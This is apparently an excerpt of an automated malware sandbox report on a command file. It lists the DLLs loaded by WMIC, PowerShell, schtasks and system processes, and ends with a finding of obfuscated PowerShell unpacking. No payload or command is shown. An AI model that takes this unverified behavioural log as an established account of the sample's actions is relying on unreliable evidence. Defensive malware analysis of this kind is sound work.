Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: 1 (2).cmd Static file information: File size 5285337 > 1048576

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
